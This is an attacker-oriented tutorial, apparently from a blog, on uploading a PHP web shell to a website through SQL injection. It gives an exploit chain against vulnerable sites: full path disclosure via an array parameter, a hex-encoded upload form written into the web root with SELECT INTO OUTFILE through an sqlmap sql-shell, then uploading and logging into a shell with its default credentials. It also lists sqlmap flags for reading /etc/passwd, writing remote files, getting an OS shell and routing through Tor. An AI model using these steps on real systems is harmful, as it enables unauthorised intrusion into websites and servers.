Upload shell with sql injection

what you need: ?
A PHP Shell ^
A upload script ^ (optional might work without)
sqlmap^ (optional but makes it so much easier)

what is a shell ?
Quote
Shell is a shell wrapped in a script. It's a tool you can use
to execute arbitrary shell-commands or browse the
filesystem on your remote webserver. This replaces, to a
degree, a normal telnet connection, and to a lesser degree a
SSH connectio.

You use it for administration and maintenance of your
website, which is often much easier to do if you can work
directly on the server. For example, you could use PHP Shell
to unpack and move big files around. All the normal
command line programs like ps, free, du, df, etc can be
used.
There are some limitations on what kind of programs you
can run. It won't do no good if you start a graphical
program like Firefox or even a console based one like vi. All
programs have to be strictly command line programs, and
they will have no chance of getting user input after they
have been launched.They probably also have to terminate
within 30 seconds, as this is the default time-limit imposed
unto all PHP scripts, to prevent them from running in an
infinite loop. Your ISP may have set this time-limit to
something else.
But you can rely on all the normal shell-functionality, like
pipes, output and input redirection, etc
source ^
so lets start
1. After finding a vulnerable site you need to get Full Path
Disclosure^
I will use the empty array exploit, add the brackets []
Code: [Select]
http://www.example.com/index.php?id[]=1
gives
Code: [Select]
Warning:  mysql_fetch_array(): supplied argument is not a valid MySQL result resource i
now we have the path
2. now you need to convert your upload script to hex ^
Code: [Select]
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uplo
becomes
Code: [Select]
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2
3. Now lets fire up sqlmap with a sql-shell and inject
Code: [Select]
python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell
let sqlmap do its magic and after a while you will get a sql-
shell
Quote
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q'
and press ENTER
sql-shell>
now write
SELECT 0x Your_Hex_Code INTO OUTFILE "Full_Path
+filename";
don't forget the 0x before your hex, so it soul look like
Code: [Select]
select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374
into "/home/relax/public_html/upload.php";
After a few seconds you should get a confirmation if it
was successful or not
4. browse to http://www.example.com/upload.php and
upload the php shell
5. browse to your php shell and login
Info:
The username and password for the shell is cyber,
gladiator, you can change this in the php file, this specific
shell must be named cyb3r-sh3ll.php or it will not work
Think about having a unique name for your upload file so you
don't overwrite some existing file, if you change name you
also need to change the source.
Extra:
You don't need to use sqlmap you can simply run the select
statement in your browser it requires a bit more work tho.
A theory is that you can inject the full shellcode directly
instead of first writing the uploader, the problems is that
this specific shell is 268kB but maybe with a smaller shell
sqlmap is really powerful tool you can do shitt load of stuff
with it here are some functions i find helpfull:
-o optimization
--threads=1-10 nr of threads (faster)
--dbms=mysql backend dbms (faster)
--level=1-5 more-tests
--risk=1-3 more-tests
--tor-port=xxxx connect through tor
--random-agent random user agent
--file-read=/etc/passwd read local file
--file-write=/etc/passwd write file to remote
machine must be used with file-dest
--file-dest=/etc/passwd where to write the
file-write
--os-shell like the sql-shell but
system
--wizard for beginners
--check-waf Check for WAF/IPS/
IDS protection
there are many more just check them out
The --file-read/write does not work most of the times
maybe im doing something wrong thats why i use sql-shell
to write files or do specific commands.
--os-shell is awesome, you cant write php code to disk
tho.
well that was it i think, please share your thoughts/
concerns or my mistakes
Happy hunting 😎

Comments

Popular posts from this blog

Reliance to Launch 4G Smartphones Under 'Lyf' Brand

14 Things You Can Do in Android Marshmallow That You Couldn't Do in Lollipop

How to Make Your Computer Faster – 10 Proven tips